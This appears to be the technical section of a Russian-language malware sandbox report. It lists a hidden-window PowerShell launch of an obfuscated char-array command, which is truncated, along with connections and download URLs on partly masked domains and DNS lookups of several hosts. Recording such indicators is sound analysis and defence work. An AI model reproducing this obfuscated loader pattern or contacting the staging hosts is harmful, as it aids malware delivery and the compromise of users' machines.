Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [strInG]::JoIN('',([cHar[]] (41,107, 89,111 ,76 , 88, 70, 45 , 48,45 ,99,104 ,122 ,32,98 ,111,103, 104 , 110,121 ,45 , 127,108, 99 ,105, 98,96, 54, 41,79,119,123 ,110, 66, 45 , 48 ,45, 99, 104 ...
- 'bl######erdistribution.com':80
- 'ra##er.md':80
- 'ra##er.md':443
- http://www.bl######erdistribution.com/qCjh9e/
- http://bl######erdistribution.com/qCjh9e/
- http://www.ra##er.md/AOyizLv/
- 'ra##er.md':443
- DNS ASK or#######onlineinlucknow.com
- DNS ASK bl######erdistribution.com
- DNS ASK pr####imisoreana.md
- DNS ASK gl####ceramica.ru
- DNS ASK ra##er.md
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [strInG]::JoIN('',([cHar[]] (41,107, 89,111 ,76 , 88, 70, 45 , 48,45 ,99,104 ,122 ,32,98 ,111,103, 104 , 110,121 ,45 , 127,108, 99 ,105, 98,96, 54, 41,79,119,123 ,110, 66, 45 , 48 ,45, 99, 104 ...' (со скрытым окном)